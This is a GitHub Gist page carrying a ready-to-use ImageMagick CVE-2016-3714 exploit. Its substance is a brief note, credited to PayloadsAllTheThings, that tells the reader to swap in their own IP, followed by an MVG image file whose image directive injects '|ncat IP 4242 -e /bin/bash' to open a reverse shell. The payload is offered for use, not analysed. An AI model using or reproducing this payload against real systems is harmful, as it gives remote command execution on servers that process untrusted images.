-
-
Save sbnsec/5920bc6dacc725497ae3e7cf3b499891 to your computer and use it in GitHub Desktop.
ImageMagick-6.9.3-9 CVE-2016–3714 RCE Payload
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Based on https://github.com/swisskyrepo/PayloadsAllTheThings | |
This needs to be adapted to exploit a Docker container. Replace the IP with your own. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
push graphic-context | |
encoding "UTF-8" | |
viewbox 0 0 1 1 | |
affine 1 0 0 1 0 0 | |
push graphic-context | |
image Over 0,0 1,1 '|ncat IP 4242 -e /bin/bash' | |
pop graphic-context | |
pop graphic-context | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment